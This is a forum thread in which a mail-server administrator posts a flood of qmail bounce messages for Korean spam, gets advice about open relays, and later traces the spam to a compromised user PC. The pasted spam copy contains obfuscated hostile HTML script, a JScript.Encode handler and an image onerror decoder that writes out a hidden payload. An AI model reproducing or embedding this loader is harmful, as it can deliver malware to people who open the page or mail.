Topic: MAILER-DAEMON@mydomain.com error, I don't understand

[mapangojoe]

Hello All.  A few days ago I started getting these errors sent to Admin.  I only noticed them today.  They are arriving at a rate of 2 per minute.  Can someone please explain what may be occurring?

___________________________________________Hi. This is the qmail-send program at mydomain.net.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<tommyhg@hanmail.net>:
Connected to 211.43.197.182 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhi@hanmail.net>:
Connected to 211.43.197.142 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyica@hanmail.net>:
Connected to 211.43.197.182 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhoho@hanmail.net>:
Connected to 211.43.197.47 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhiphip@hanmail.net>:
Connected to 211.43.197.47 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhilesco@hanmail.net>:
Connected to 211.43.197.96 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhong225@hanmail.net>:
Connected to 211.43.197.47 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhilfiger1@hanmail.net>:
Connected to 211.43.197.119 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyho15@hanmail.net>:
Connected to 211.43.197.171 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyishere@hanmail.net>:
Connected to 211.43.197.171 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyisyoung@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhoon@hanmail.net>:
Connected to 222.231.35.16 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjee@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjeans2@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjeong@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyj68@hanmail.net>:
Connected to 211.43.197.20 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhh@hanmail.net>:
Connected to 222.231.35.15 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyjin@hanmail.net>:
Connected to 211.43.197.142 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyhil@hanmail.net>:
Connected to 222.231.35.15 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

<tommyji@hanmail.net>:
Connected to 222.231.35.15 but greeting failed.
Remote host said: 554 5.7.1 66.225.16.170: Connection refused. Your IP address is blocked(anti-spam).
I'm not going to try again; this message has been in the queue too long.

--- Below this line is a copy of the message.

Return-Path: <webmaster@myotherdomain.com>
Received: (qmail 32026 invoked from network); 9 Feb 2007 01:17:54 -0000
Received: from unknown (HELO biioiew.com) (218.53.105.175)
  by server.mydomain.net (66.225.16.170) with SMTP; 09 Feb 2007 01:17:54 -0000
Received: from 203.92.51.115 (203.92.51.115) by biioiew.com; Fri, 09 Feb 2007 10:27:22 GMT
From: "¹è¼÷Èñ" <webmaster@myotherdomina.com>
To: "tommyh" <tommyhg@hanmail.net>
Subject: ¢º¼­===¹Î===±Ý==À¶:(³â7.5~12%)!990320
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary= "----=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21"
X-Priority: 5
X-MSMail-Priority: Low
X-Mailer: Microsoft Outlook Express 5.00.2615.200

------=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21
Content-type: text/html
Content-Transfer-Encoding: base64

DQo=

------=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21
Content-Type: text/html; name=" 1 "
Content-Disposition: inline; filename=" ¿©±â Ŭ¸¯! ´çÀÏ ÃÖÀú±Ý¸® ¹ÞÀ¸¼¼¿ä~~ "

<html><embed style=position:absolute style=background-color:#ffffff style=width:1000px style=height=2000px style=left:0px style=top:0px OnMOuseover= 'jscRIPT.EnCode: #@~^SAAAAA==sKmCDkKxRM+asl1+cB4YO2=zzu{cuv0u{{]+cc]NYO]&u{ uvWY+&]quG+Ru{y]6B*iixIAAA==^#~@'><IMG src="                             "ONERROr= 'vorct3="&4DTDSJQU&31mbohvbhf&4EKTdsjqu/Fodpef&4F&34A&8F&6FTBBBBB&4E&4EtLnDElLySN,btm2,dC5ZP3&4E{{v&8Cdvw1v&8C&8C&6E,dd&6E&8GOZ&8GP&6E&8G&37v&8C&31vwXZ,&37&6E&8GrvH,Sv&8Cz&6E&8G7C+jjyJBBB&4E&4E&6F&34&8FA&4D0TDSJQU&4F";    daum    =     "";for(k=0;k<vorct3.length;k++){daum+=String. fromCharCode (vorct3.charCodeAt(k) - 1);;}document.write  (unescape(daum));'"
------=_NEXTPart_YIE_VQZ_GWK5_LU782XR5_1RK6J21--
Delete | Reply | Reply to All | Forward | Redirect | Blacklist | Message Source | Save as | Print    Back to INBOX   Next Message
Move | Copy

[CharlieBrady]

Return-Path: <webmaster@myotherdomain.com>
Received: (qmail 32026 invoked from network); 9 Feb 2007 01:17:54 -0000
Received: from unknown (HELO biioiew.com) (218.53.105.175)
  by server.mydomain.net (66.225.16.170) with SMTP; 09 Feb 2007 01:17:54 -0000
...

It looks to me as though you may have somehow managed to configure your system as an open mail realy, and spammers have discovered it. It's difficult to say, as you appear to have obfuscated the message - does it really say "myotherdomain.com"?

Do you have a form on your website which allows sending of mail? If so, disable it immediately, until it is proven not be forwarding spam.

Send a full unmodified copy of the message, including full headers, to security at contribs dot org and someone will take a closer look.

[mapangojoe]

Thanks for getting back to me on this.    I continued to try to figure out what was occurring.    I'm not an expert at this, but I have installed at least a dozen SME servers, and have never had one cracked.   All the return messages seemed to come back from one of my domains, see the "myotherdomain.com" below (I obfuscated the name to protect the guilty!!).  Finally, I deduced that the Email was probably being sent from a violated Windows PC (can you IMAGINE that !!!) and that PC was sending out SPAM.  I changed the username of the person using that account, and the SPAM returns have Stopped cold.   I then called the User and explained that her PC may have been hacked and that I had shutdown her account for a while.  She then went on to explain to me how her PC was acting very slow and strange lately, and that Outlook would not work any more.  She could not tell me anything about the status of her Antivirus software or her MS critical updates.

I just thought I'd update the list.  I'll continue to monitor, but I consider this case closed!


Chris Curtis



mapangojoe wrote:

Return-Path: <webmaster@myotherdomain.com>
Received: (qmail 32026 invoked from network); 9 Feb 2007 01:17:54 -0000
Received: from unknown (HELO biioiew.com) (218.53.105.175)
by server.mydomain.net (66.225.16.170) with SMTP; 09 Feb 2007 01:17:54 -0000
...


It looks to me as though you may have somehow managed to configure your system as an open mail realy, and spammers have discovered it. It's difficult to say, as you appear to have obfuscated the message - does it really say "myotherdomain.com"?

Do you have a form on your website which allows sending of mail? If so, disable it immediately, until it is proven not be forwarding spam.

Send a full unmodified copy of the message, including full headers, to security at contribs dot org and someone will take a closer look.